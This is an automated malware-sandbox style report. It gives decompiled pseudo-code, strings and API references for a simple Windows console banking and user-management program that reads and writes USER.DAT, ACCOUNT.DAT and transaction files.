                                                • TRANSACTION.DAT, xrefs: 01234950
                                                • Transaction completed successfully!, xrefs: 012349C4
                                                • %s %s %s %s %.2f %s, xrefs: 01234994
                                                • ACCOUNT.DAT, xrefs: 01234805
                                                • TEMP.DAT, xrefs: 0123481C
                                                • Amount to be Deposited (in NRs.) : , xrefs: 012346EE
                                                • [ %s ], xrefs: 012346D8
                                                • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 0123486A
                                                • %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 01234915
                                                • Confirm Transaction, xrefs: 0123471A
                                                • Given A/C number does not exits!, xrefs: 012346B6
                                                • ACCOUNT.DAT, xrefs: 01234681
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vwscanf
                                                • String ID: %s %s %s %s %.2f %s$%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$%s to be deposited in A/C number : %s [ %s ]$ACCOUNT.DAT$ACCOUNT.DAT$Amount to be Deposited (in NRs.) : $Are you sure you want to perform this tranasction? <Y/N>$Cash+Deposited$Confirm Transaction$Deposit to A/C number : $Given A/C number does not exits!$TEMP.DAT$TRANSACTION.DAT$Transaction completed successfully!$[ %s ]
                                                • API String ID: 532294799-930819241
                                                • Opcode ID: 36d9b47078b892e7da5ba9ef6553782b70b2e977129376ef7b9a9ee83f7656da
                                                • Instruction ID: f0d91d520195e11ca8cb4939e558e55eddc5d4bdbc70a094af231fb1ae6ee06c
                                                • Opcode Fuzzy Hash: 36d9b47078b892e7da5ba9ef6553782b70b2e977129376ef7b9a9ee83f7656da
                                                • Instruction Fuzzy Hash: 1C91B7F2D3030ABBDB15FBA09C82EEE77785FA5700F004259F90575180FA7166988BB6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 80%
                                                			E01232B10(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                				char _v5;
                                                				intOrPtr _v12;
                                                				intOrPtr _v16;
                                                				char _v19;
                                                				char _v23;
                                                				char _v27;
                                                				char _v31;
                                                				char _v35;
                                                				char _v39;
                                                				char _v43;
                                                				char _v47;
                                                				char _v48;
                                                				char _v51;
                                                				char _v55;
                                                				char _v59;
                                                				char _v63;
                                                				char _v67;
                                                				char _v71;
                                                				char _v75;
                                                				char _v79;
                                                				char _v80;
                                                				char _v83;
                                                				char _v87;
                                                				char _v91;
                                                				char _v95;
                                                				char _v99;
                                                				char _v103;
                                                				char _v107;
                                                				char _v111;
                                                				char _v112;
                                                				char _v144;
                                                				char _v176;
                                                				char _v208;
                                                				void* __ebp;
                                                				intOrPtr _t66;
                                                				intOrPtr _t67;
                                                				void* _t68;
                                                				intOrPtr _t84;
                                                				intOrPtr _t86;
                                                				intOrPtr _t87;
                                                				void* _t88;
                                                				intOrPtr _t89;
                                                				intOrPtr _t95;
                                                				intOrPtr _t98;
                                                				intOrPtr _t105;
                                                				char _t106;
                                                				void* _t109;
                                                				void* _t110;
                                                				intOrPtr _t119;
                                                				intOrPtr _t130;
                                                				intOrPtr _t132;
                                                				void* _t136;
                                                				void* _t140;
                                                				void* _t141;
                                                				void* _t142;
                                                				void* _t143;
                                                				void* _t149;
                                                				void* _t150;
                                                				void* _t154;
                                                
                                                				_t161 = __fp0;
                                                				_t135 = __esi;
                                                				_t134 = __edi;
                                                				_t113 = __ebx;
                                                				_v48 = 0;
                                                				_v47 = 0;
                                                				_v43 = 0;
                                                				_v39 = 0;
                                                				_v35 = 0;
                                                				_v31 = 0;
                                                				_v27 = 0;
                                                				_v23 = 0;
                                                				_v19 = 0;
                                                				_v112 = 0;
                                                				_v111 = 0;
                                                				_v107 = 0;
                                                				_v103 = 0;
                                                				_v99 = 0;
                                                				_v95 = 0;
                                                				_v91 = 0;
                                                				_v87 = 0;
                                                				_v83 = 0;
                                                				_v80 = 0;
                                                				_v79 = 0;
                                                				_v75 = 0;
                                                				_v71 = 0;
                                                				_v67 = 0;
                                                				_v63 = 0;
                                                				_v59 = 0;
                                                				_v55 = 0;
                                                				_v51 = 0;
                                                				_v16 = 0;
                                                				_v12 = 0;
                                                				E012320E0(0, __edi, __esi, 0, __fp0);
                                                				E012312B0(0x19, 8);
                                                				_push("User Name  : ");
                                                				E0123715C(__ebx, __edi, __esi, 0);
                                                				E0123738B("%s", 0x1252ee4);
                                                				E012312B0(0x19, 0xa);
                                                				_push("Password  : ");
                                                				E0123715C(__ebx, __edi, __esi, 0);
                                                				E012312F0(_t134, _t135,  &_v112);
                                                				_t66 = E01236EF1("USER.DAT", "r");
                                                				_t140 = _t136 + 0x18;
                                                				 *0x1252f28 = _t66;
                                                				while(1) {
                                                					_push( &_v144);
                                                					_push( &_v176);
                                                					_t67 =  *0x1252f28; // 0x0
                                                					_t68 = E01237021(_t67, "%s %s %s\n", 0x1252ee0);
                                                					_t141 = _t140 + 0x14;
                                                					if(_t68 == 0xffffffff) {
                                                						break;
                                                					}
                                                					_t109 = E01238230(0x1252ee4,  &_v176);
                                                					_t140 = _t141 + 8;
                                                					if(_t109 == 0) {
                                                						_t110 = E01238230(0x1252f02,  &_v144);
                                                						_t140 = _t140 + 8;
                                                						if(_t110 == 0) {
                                                							_v16 = _v16 + 1;
                                                						}
                                                					}
                                                				}
                                                				_t116 =  *0x1252f28; // 0x0
                                                				_push(_t116);
                                                				E01236DB6(_t113, _t134, _t135, __eflags);
                                                				_t142 = _t141 + 4;
                                                				E012320E0(_t116, _t134, _t135, __eflags, _t161);
                                                				__eflags = _v16;
                                                				if(__eflags != 0) {
                                                					E012312B0(8, 0xa);
                                                					_push("Are you sure you want to CHANGE user name and/or password? <Y/N> : ");
                                                					E0123715C(_t113, _t134, _t135, __eflags);
                                                					_t143 = _t142 + 4;
                                                					__eflags = _v5 - 0x59;
                                                					if(__eflags == 0) {
                                                						do {
                                                							L10:
                                                							E012320E0(_t116, _t134, _t135, __eflags, _t161);
                                                							_v12 = 0;
                                                							E012312B0(0x19, 8);
                                                							_push("NEW User Name        : ");
                                                							E0123715C(_t113, _t134, _t135, __eflags);
                                                							E0123738B("%s",  &_v208);
                                                							E012312B0(0x19, 0xa);
                                                							_push("NEW Password         : ");
                                                							E0123715C(_t113, _t134, _t135, __eflags);
                                                							E012312F0(_t134, _t135,  &_v48);
                                                							E012312B0(0x19, 0xc);
                                                							_push("Confirm NEW Password : ");
                                                							E0123715C(_t113, _t134, _t135, __eflags);
                                                							E012312F0(_t134, _t135,  &_v80);
                                                							_t116 =  &_v80;
                                                							_t84 = E01238230( &_v48,  &_v80);
                                                							_t143 = _t143 + 0x1c;
                                                							__eflags = _t84;
                                                							if(__eflags != 0) {
                                                								E012320E0( &_v80, _t134, _t135, __eflags, _t161);
                                                								E012312B0(0xa, 0xa);
                                                								_push(0x124f710);
                                                								E0123715C(_t113, _t134, _t135, __eflags);
                                                								_t143 = _t143 + 4;
                                                								_t105 = _v12 + 1;
                                                								__eflags = _t105;
                                                								_v12 = _t105;
                                                							}
                                                							__eflags = _v12;
                                                						} while (__eflags != 0);
                                                						 *0x1252f28 = E01236EF1("USER.DAT", 0x124f740);
                                                						_t86 = E01236EF1("temp.dat", "a");
                                                						_t149 = _t143 + 0x10;
                                                						 *0x1252f20 = _t86;
                                                						while(1) {
                                                							_push( &_v144);
                                                							_push( &_v176);
                                                							_t87 =  *0x1252f28; // 0x0
                                                							_t88 = E01237021(_t87, "%s %s %s\n", 0x1252ee0);
                                                							_t150 = _t149 + 0x14;
                                                							__eflags = _t88 - 0xffffffff;
                                                							if(__eflags == 0) {
                                                								break;
                                                							}
                                                							_t95 = E01238230(0x1252ee4,  &_v176);
                                                							_t154 = _t150 + 8;
                                                							__eflags = _t95;
                                                							if(__eflags != 0) {
                                                								L17:
                                                								_push( &_v144);
                                                								_push( &_v176);
                                                								_push(0x1252ee0);
                                                								_push("%s %s %s\n");
                                                								_t130 =  *0x1252f20; // 0x0
                                                								_push(_t130);
                                                								E01236F06(_t113, _t134, _t135, __eflags);
                                                								_t149 = _t154 + 0x14;
                                                								L19:
                                                								continue;
                                                							}
                                                							_t98 = E01238230(0x1252f02,  &_v144);
                                                							_t154 = _t154 + 8;
                                                							__eflags = _t98;
                                                							if(__eflags == 0) {
                                                								_push( &_v48);
                                                								_push( &_v208);
                                                								_push(0x1252ee0);
                                                								_push("%s %s %s\n");
                                                								_t132 =  *0x1252f20; // 0x0
                                                								_push(_t132);
                                                								E01236F06(_t113, _t134, _t135, __eflags);
                                                								_t149 = _t154 + 0x14;
                                                								goto L19;
                                                							}
                                                							goto L17;
                                                						}
                                                						_t89 =  *0x1252f28; // 0x0
                                                						_push(_t89);
                                                						E01236DB6(_t113, _t134, _t135, __eflags);
                                                						_t119 =  *0x1252f20; // 0x0
                                                						_push(_t119);
                                                						E01236DB6(_t113, _t134, _t135, __eflags);
                                                						E012320E0(_t119, _t134, _t135, __eflags, _t161);
                                                						E012312B0(0x19, 0xa);
                                                						_push("Record has been EDITED successfully!");
                                                						return E0123715C(_t113, _t134, _t135, __eflags);
                                                					}
                                                					_t106 = _v5;
                                                					__eflags = _t106 - 0x79;
                                                					if(__eflags != 0) {
                                                						return _t106;
                                                					}
                                                					goto L10;
                                                				}
                                                				E012312B0(0xa, 0xa);
                                                				_push(0x124f640);
                                                				return E0123715C(_t113, _t134, _t135, __eflags);
                                                			}


                                                APIs
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 01232B94
                                                • _wscanf.LIBCMT ref: 01232BA6
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                • _wprintf.LIBCMT ref: 01232BBC
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                  • Part of subcall function 012312F0: _wprintf.LIBCMT ref: 01231329
                                                  • Part of subcall function 01236EF1: __fsopen.LIBCMT ref: 01236EFC
                                                • _swscanf.LIBCMT ref: 01232C02
                                                  • Part of subcall function 01237021: _vfscanf.LIBCMT ref: 01237035
                                                • _wprintf.LIBCMT ref: 01232C72
                                                • _wprintf.LIBCMT ref: 01232C8D
                                                • _wprintf.LIBCMT ref: 01232CC5
                                                • _wscanf.LIBCMT ref: 01232CD9
                                                • _wprintf.LIBCMT ref: 01232CEF
                                                • _wprintf.LIBCMT ref: 01232D0E
                                                • _wprintf.LIBCMT ref: 01232D46
                                                • _swscanf.LIBCMT ref: 01232DAD
                                                • _fprintf.LIBCMT ref: 01232E0D
                                                • _fprintf.LIBCMT ref: 01232E33
                                                • _wprintf.LIBCMT ref: 01232E70
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _wprintf$__wstrtime_fprintf_swscanf_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vfscanf_vwscanf
                                                • String ID: %s %s %s$%s %s %s$%s %s %s$%s %s %s$Are you sure you want to CHANGE user name and/or password? <Y/N> : $Confirm NEW Password : $NEW Password : $NEW User Name : $Password : $Record has been EDITED successfully!$USER.DAT$USER.DAT$User Name : $temp.dat
                                                • API String ID: 1431756120-371646773
                                                • Opcode ID: d396c3ed00661b2f4ae72a74369d26af51d90cfbdae015bbb73c10797e6c65de
                                                • Instruction ID: fcc9a805462d712e36d20f9da7b5c517cc61060683e2cd0e342f5b7ae423bcdf
                                                • Opcode Fuzzy Hash: d396c3ed00661b2f4ae72a74369d26af51d90cfbdae015bbb73c10797e6c65de
                                                • Instruction Fuzzy Hash: C181A7F1D70306EFEF15EBE9DD42FAD76746BB5700F008169E505B6280E670A2188B76
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E01232800(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __fp0) {
                                                				char _v5;
                                                				intOrPtr _v12;
                                                				char _v20;
                                                				char _v23;
                                                				char _v27;
                                                				char _v31;
                                                				char _v35;
                                                				char _v39;
                                                				char _v43;
                                                				char _v47;
                                                				char _v51;
                                                				char _v52;
                                                				char _v84;
                                                				char _v116;
                                                				char _v129;
                                                				char _v139;
                                                				char _v154;
                                                				char _v188;
                                                				void* __ebp;
                                                				intOrPtr _t47;
                                                				void* _t49;
                                                				char _t54;
                                                				intOrPtr _t56;
                                                				void* _t58;
                                                				intOrPtr _t62;
                                                				void* _t65;
                                                				intOrPtr _t67;
                                                				intOrPtr _t75;
                                                				intOrPtr _t79;
                                                				intOrPtr _t80;
                                                				intOrPtr _t83;
                                                				void* _t86;
                                                				void* _t88;
                                                				intOrPtr _t92;
                                                				intOrPtr _t93;
                                                				intOrPtr _t94;
                                                				intOrPtr _t96;
                                                				intOrPtr _t99;
                                                				intOrPtr _t105;
                                                				intOrPtr _t107;
                                                				intOrPtr _t109;
                                                				void* _t118;
                                                				void* _t122;
                                                				void* _t123;
                                                				void* _t124;
                                                				void* _t125;
                                                				void* _t127;
                                                				void* _t128;
                                                				void* _t132;
                                                				void* _t133;
                                                				void* _t139;
                                                
                                                				_t146 = __fp0;
                                                				_t117 = __esi;
                                                				_t116 = __edi;
                                                				_t89 = __ebx;
                                                				_v52 = 0;
                                                				_v51 = 0;
                                                				_v47 = 0;
                                                				_v43 = 0;
                                                				_v39 = 0;
                                                				_v35 = 0;
                                                				_v31 = 0;
                                                				_v27 = 0;
                                                				_v23 = 0;
                                                				_v12 = 0;
                                                				E012320E0(__ecx, __edi, __esi, 0, __fp0);
                                                				E012312B0(0x19, 8);
                                                				_push("User Name  : ");
                                                				E0123715C(__ebx, __edi, __esi, 0);
                                                				E0123738B("%s", 0x1252ee4);
                                                				E012312B0(0x19, 0xa);
                                                				_push("Password  : ");
                                                				E0123715C(__ebx, __edi, __esi, 0);
                                                				E012312F0(_t116, _t117,  &_v52);
                                                				_t47 = E01236EF1("USER.DAT", "r");
                                                				_t122 = _t118 + 0x18;
                                                				 *0x1252f28 = _t47;
                                                				while(1) {
                                                					_push( &_v116);
                                                					_push( &_v84);
                                                					_t92 =  *0x1252f28; // 0x0
                                                					_t49 = E01237021(_t92, "%s %s %s\n", 0x1252ee0);
                                                					_t123 = _t122 + 0x14;
                                                					if(_t49 == 0xffffffff) {
                                                						break;
                                                					}
                                                					_t86 = E01238230(0x1252ee4,  &_v84);
                                                					_t122 = _t123 + 8;
                                                					if(_t86 == 0) {
                                                						_t88 = E01238230(0x1252f02,  &_v116);
                                                						_t122 = _t122 + 8;
                                                						if(_t88 == 0) {
                                                							_v12 = _v12 + 1;
                                                						}
                                                					}
                                                				}
                                                				_t105 =  *0x1252f28; // 0x0
                                                				_push(_t105);
                                                				E01236DB6(_t89, _t116, _t117, __eflags);
                                                				_t124 = _t123 + 4;
                                                				E012320E0(_t92, _t116, _t117, __eflags, _t146);
                                                				__eflags = _v12;
                                                				if(__eflags != 0) {
                                                					E012312B0(0xf, 0xa);
                                                					_push("Are you sure you want to DELETE this user? <Y/N> : ");
                                                					E0123715C(_t89, _t116, _t117, __eflags);
                                                					_t125 = _t124 + 4;
                                                					_t54 = _v5;
                                                					__eflags = _t54 - 0x59;
                                                					if(_t54 == 0x59) {
                                                						L10:
                                                						 *0x1252f28 = E01236EF1("USER.DAT", "r");
                                                						_t56 = E01236EF1("temp.dat", "a");
                                                						_t127 = _t125 + 0x10;
                                                						 *0x1252f20 = _t56;
                                                						while(1) {
                                                							_push( &_v116);
                                                							_push( &_v84);
                                                							_t93 =  *0x1252f28; // 0x0
                                                							_t58 = E01237021(_t93, "%s %s %s\n", 0x1252ee0);
                                                							_t128 = _t127 + 0x14;
                                                							__eflags = _t58 - 0xffffffff;
                                                							if(__eflags == 0) {
                                                								break;
                                                							}
                                                							_t79 = E01238230(0x1252ee4,  &_v84);
                                                							_t139 = _t128 + 8;
                                                							__eflags = _t79;
                                                							if(__eflags != 0) {
                                                								L14:
                                                								_push( &_v116);
                                                								_push( &_v84);
                                                								_push(0x1252ee0);
                                                								_push("%s %s %s\n");
                                                								_t80 =  *0x1252f20; // 0x0
                                                								_push(_t80);
                                                								E01236F06(_t89, _t116, _t117, __eflags);
                                                								_t127 = _t139 + 0x14;
                                                								L15:
                                                								continue;
                                                							}
                                                							_t83 = E01238230(0x1252f02,  &_v116);
                                                							_t127 = _t139 + 8;
                                                							__eflags = _t83;
                                                							if(__eflags == 0) {
                                                								goto L15;
                                                							}
                                                							goto L14;
                                                						}
                                                						_t94 =  *0x1252f28; // 0x0
                                                						_push(_t94);
                                                						E01236DB6(_t89, _t116, _t117, __eflags);
                                                						_t107 =  *0x1252f20; // 0x0
                                                						_push(_t107);
                                                						E01236DB6(_t89, _t116, _t117, __eflags);
                                                						 *0x1252f28 = E01236EF1("LOG.DAT", "r");
                                                						_t62 = E01236EF1("temp.dat", "w");
                                                						_t132 = _t128 + 0x18;
                                                						 *0x1252f20 = _t62;
                                                						while(1) {
                                                							_push( &_v129);
                                                							_push( &_v139);
                                                							_push( &_v154);
                                                							_t96 =  *0x1252f28; // 0x0
                                                							_t65 = E01237021(_t96, "%s %s %s %s",  &_v188);
                                                							_t133 = _t132 + 0x18;
                                                							__eflags = _t65 - 0xffffffff;
                                                							if(__eflags == 0) {
                                                								break;
                                                							}
                                                							E01247CF2( &_v188);
                                                							E01247CF2( &_v20);
                                                							_t75 = E01238230( &_v188,  &_v20);
                                                							_t132 = _t133 + 0x10;
                                                							__eflags = _t75;
                                                							if(__eflags != 0) {
                                                								_push( &_v129);
                                                								_push( &_v139);
                                                								_push( &_v154);
                                                								_push( &_v188);
                                                								_push("%s %s %s %s\n");
                                                								_t99 =  *0x1252f20; // 0x0
                                                								_push(_t99);
                                                								E01236F06(_t89, _t116, _t117, __eflags);
                                                								_t132 = _t132 + 0x18;
                                                							}
                                                						}
                                                						_t109 =  *0x1252f28; // 0x0
                                                						_push(_t109);
                                                						E01236DB6(_t89, _t116, _t117, __eflags);
                                                						_t67 =  *0x1252f20; // 0x0
                                                						_push(_t67);
                                                						E01236DB6(_t89, _t116, _t117, __eflags);
                                                						E012320E0(_t96, _t116, _t117, __eflags, _t146);
                                                						E012312B0(0x19, 0xa);
                                                						_push("Record DELETED successfully!");
                                                						return E0123715C(_t89, _t116, _t117, __eflags);
                                                					}
                                                					__eflags = _v5 - 0x79;
                                                					if(_v5 != 0x79) {
                                                						return _t54;
                                                					}
                                                					goto L10;
                                                				}
                                                				E012312B0(0xa, 0xa);
                                                				_push(0x124f4fc);
                                                				return E0123715C(_t89, _t116, _t117, __eflags);
                                                			}

                                                APIs
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 01232841
                                                • _wscanf.LIBCMT ref: 01232853
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                • _wprintf.LIBCMT ref: 01232869
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                  • Part of subcall function 012312F0: _wprintf.LIBCMT ref: 01231329
                                                  • Part of subcall function 01236EF1: __fsopen.LIBCMT ref: 01236EFC
                                                • _swscanf.LIBCMT ref: 012328AA
                                                  • Part of subcall function 01237021: _vfscanf.LIBCMT ref: 01237035
                                                • _wprintf.LIBCMT ref: 01232914
                                                • _wprintf.LIBCMT ref: 0123292F
                                                • _swscanf.LIBCMT ref: 01232994
                                                • _fprintf.LIBCMT ref: 012329E3
                                                • _swscanf.LIBCMT ref: 01232A5E
                                                • _fprintf.LIBCMT ref: 01232AC2
                                                • _wprintf.LIBCMT ref: 01232AFF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _wprintf$_swscanf$__wstrtime_fprintf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vfscanf_vwscanf_wscanf
                                                • String ID: %s %s %s$%s %s %s$%s %s %s$%s %s %s %s$%s %s %s %s$Are you sure you want to DELETE this user? <Y/N> : $LOG.DAT$Password : $Record DELETED successfully!$USER.DAT$USER.DAT$User Name : $temp.dat$temp.dat
                                                • API String ID: 3163849712-4002591224
                                                • Opcode ID: 8f68f0044d92cee46a3857197f934cba047f56bb2c8d8ece20c0c8ecc6e3979f
                                                • Instruction ID: 076d58e85ca01c1a6b5067cfb64ac55c1ffb54fb449b3a7240fb921a9c9eedcb
                                                • Opcode Fuzzy Hash: 8f68f0044d92cee46a3857197f934cba047f56bb2c8d8ece20c0c8ecc6e3979f
                                                • Instruction Fuzzy Hash: C071CBF2D30306EBDB15EBE4ED82EBE72786BE5700F04411DE905A5184FA71E25887B2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 80%
                                                			E012325C0(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                				char _v8;
                                                				char _v12;
                                                				char _v15;
                                                				char _v19;
                                                				char _v23;
                                                				char _v27;
                                                				char _v31;
                                                				char _v35;
                                                				char _v39;
                                                				char _v43;
                                                				char _v44;
                                                				char _v47;
                                                				char _v51;
                                                				char _v55;
                                                				char _v59;
                                                				char _v63;
                                                				char _v67;
                                                				char _v71;
                                                				char _v75;
                                                				char _v76;
                                                				char _v108;
                                                				char _v140;
                                                				void* __ebp;
                                                				intOrPtr _t42;
                                                				void* _t44;
                                                				intOrPtr _t53;
                                                				intOrPtr _t58;
                                                				intOrPtr _t67;
                                                				void* _t70;
                                                				void* _t73;
                                                				intOrPtr _t75;
                                                				intOrPtr _t76;
                                                				intOrPtr _t79;
                                                				void* _t83;
                                                				void* _t84;
                                                				void* _t85;
                                                				void* _t88;
                                                				void* _t89;
                                                				void* _t90;
                                                				void* _t103;
                                                
                                                				_t103 = __fp0;
                                                				_t84 = __esi;
                                                				_t83 = __edi;
                                                				_t73 = __ebx;
                                                				_v8 = 0;
                                                				_v12 = 0;
                                                				_v76 = 0;
                                                				_v75 = 0;
                                                				_v71 = 0;
                                                				_v67 = 0;
                                                				_v63 = 0;
                                                				_v59 = 0;
                                                				_v55 = 0;
                                                				_v51 = 0;
                                                				_v47 = 0;
                                                				_v44 = 0;
                                                				_t74 = 0;
                                                				_v43 = 0;
                                                				_v39 = 0;
                                                				_v35 = 0;
                                                				_v31 = 0;
                                                				_v27 = 0;
                                                				_v23 = 0;
                                                				_v19 = 0;
                                                				_v15 = 0;
                                                				do {
                                                					E012320E0(_t74, _t83, _t84, 0, _t103);
                                                					_v8 = 0;
                                                					E012312B0(0x19, 8);
                                                					_push("User Name        : ");
                                                					E0123715C(_t73, _t83, _t84, 0);
                                                					E0123738B("%s", 0x1252ee4);
                                                					_t42 = E01236EF1("USER.DAT", "r");
                                                					_t88 = _t85 + 0x14;
                                                					 *0x1252f28 = _t42;
                                                					_v12 = 0;
                                                					while(1) {
                                                						_push( &_v140);
                                                						_push( &_v108);
                                                						_t75 =  *0x1252f28; // 0x0
                                                						_t44 = E01237021(_t75, "%s %s %s\n", 0x1252ee0);
                                                						_t89 = _t88 + 0x14;
                                                						if(_t44 == 0xffffffff) {
                                                							goto L6;
                                                						}
                                                						_t70 = E01238230( &_v108, 0x1252ee4);
                                                						_t88 = _t89 + 8;
                                                						if(_t70 == 0) {
                                                							_v12 = _v12 + 1;
                                                						}
                                                					}
                                                					L6:
                                                					_t74 =  *0x1252f28; // 0x0
                                                					_push(_t74);
                                                					E01236DB6(_t73, _t83, _t84, __eflags);
                                                					_t90 = _t89 + 4;
                                                					__eflags = _v12;
                                                					if(__eflags == 0) {
                                                						E012312B0(0x19, 0xa);
                                                						_push("Password         : ");
                                                						E0123715C(_t73, _t83, _t84, __eflags);
                                                						E012312F0(_t83, _t84,  &_v76);
                                                						E012312B0(0x19, 0xc);
                                                						_push("Confirm Password : ");
                                                						E0123715C(_t73, _t83, _t84, __eflags);
                                                						_t74 =  &_v44;
                                                						E012312F0(_t83, _t84,  &_v44);
                                                						_t53 = E01238230(0x1252f02,  &_v44);
                                                						_t85 = _t90 + 0x10;
                                                						__eflags = _t53;
                                                						if(__eflags != 0) {
                                                							E012320E0( &_v44, _t83, _t84, __eflags, _t103);
                                                							E012312B0(0xa, 0xa);
                                                							_push(0x124f444);
                                                							E0123715C(_t73, _t83, _t84, __eflags);
                                                							_t85 = _t85 + 4;
                                                							_t67 = _v8 + 1;
                                                							__eflags = _t67;
                                                							_v8 = _t67;
                                                						}
                                                					} else {
                                                						E012312B0(0xa, 0xa);
                                                						_push(0x124f3e0);
                                                						E0123715C(_t73, _t83, _t84, __eflags);
                                                						_t85 = _t90 + 4;
                                                						_v8 = _v8 + 1;
                                                					}
                                                					__eflags = _v8;
                                                				} while (__eflags != 0);
                                                				 *0x1252f28 = E01236EF1("USER.DAT", 0x124f474);
                                                				_t76 =  *0x1252f28; // 0x0
                                                				_push(_t76);
                                                				E01236DB6(_t73, _t83, _t84, __eflags);
                                                				 *0x1252f28 = E01236EF1("USER.DAT", "a");
                                                				_push(0x1252f02);
                                                				_push(0x1252ee4);
                                                				_push(0x1252ee0);
                                                				_push("%s %s %s\n");
                                                				_t79 =  *0x1252f28; // 0x0
                                                				_push(_t79);
                                                				E01236F06(_t73, _t83, _t84, __eflags);
                                                				_t58 =  *0x1252f28; // 0x0
                                                				_push(_t58);
                                                				E01236DB6(_t73, _t83, _t84, __eflags);
                                                				E012320E0(_t76, _t83, _t84, __eflags, _t103);
                                                				E012312B0(0x19, 0xa);
                                                				_push("Record ADDED successfully!");
                                                				return E0123715C(_t73, _t83, _t84, __eflags);
                                                			}

                                                APIs
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 0123262D
                                                • _wscanf.LIBCMT ref: 0123263F
